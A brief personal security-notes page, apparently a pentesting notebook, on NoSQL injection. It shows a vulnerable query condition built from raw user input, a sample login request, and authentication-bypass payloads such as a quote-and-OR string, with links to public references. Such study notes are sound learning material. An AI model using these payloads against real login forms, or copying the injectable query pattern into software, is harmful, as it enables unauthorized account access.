💥Cyb3rBook

Home

❯

000 INBOX

❯

NOSQLI

NOSQLI

Jul 18, 20261 min read

PRIMARY CATEGORY → WEB ATTACKS

Theory

🛠️⌛


Auth Bypass

Login Form
Code
this.username === '${value}' && this.password === '${value}'
Request
POST /login HTTP/1.1
<SNIP>
Content-Type: application/x-www-form-urlencoded
 
username=<USER>&password=<PASSWD>
Payload

SQLi → admin' OR 'a'='a

admin' || 'a' === 'a

e.g.

username=admin' || 'a' === 'a&password=test

Resources

Null Sweep: A NoSQL Injection Primer with MongoDB

PayloadAllTheThings: NoSQL Injection

Portswigger: NoSQL Injection


Graph View

  • Theory
  • Auth Bypass
  • Resources

Backlinks

  • WEB ATTACKS

Created with Quartz v4.4.0 © 2026

  • GitHub
  • LinkedIn